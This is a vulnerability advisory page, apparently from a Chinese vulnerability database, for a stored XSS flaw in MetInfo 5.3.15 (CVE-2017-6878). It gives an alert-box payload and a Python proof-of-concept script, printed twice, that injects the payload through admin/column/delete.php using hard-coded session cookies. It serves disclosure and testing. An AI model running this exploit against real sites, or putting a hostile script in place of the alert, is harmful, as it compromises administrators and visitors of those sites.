MetInfo5.3.15 存储型 XSS 漏洞（CVE-2017-6878）

基本字段

漏洞编号：: SSV-92810

披露/发现时间：: 未知

提交时间：: 2017-03-22

漏洞等级：

漏洞类别：: 跨站脚本

影响组件：: MetInfo

漏洞作者：: Arice.chen

提交者：: Knownsec

CVE-ID：: CVE-2017-6878

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://seclists.org/fulldisclosure/2017/Mar/49

漏洞详情

贡献者 Knownsec 共获得 0KB

Vulnerability details：

To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)> Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed.

E-mail：callarice () 163 com
DBAppSecurity Ltd
www.dbappsecurity.com.cn

POC:

import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img 
src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) 
Version/5.1 Safari/534.50",
 }
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
  recordurl="",
  met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
  met_key="pnZh0Fw",
  langset="cn",
  upgraderemind="1",
  tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
  )
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
  print 'Success'

Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background. The problem find is delete.php?name_2= payload is : <img src=x onerror=alert(2)>

If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0KB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img 
src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) 
Version/5.1 Safari/534.50",
 }
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
  recordurl="",
  met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
  met_key="pnZh0Fw",
  langset="cn",
  upgraderemind="1",
  tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
  )
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
  print 'Success'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

MetInfo5.3.15 存储型 XSS 漏洞（CVE-2017-6878）

基本字段

来源

漏洞详情

Vulnerability details：

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

MetInfo5.3.15 存储型 XSS 漏洞（CVE-2017-6878）

基本字段

来源

漏洞详情

Vulnerability details：

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定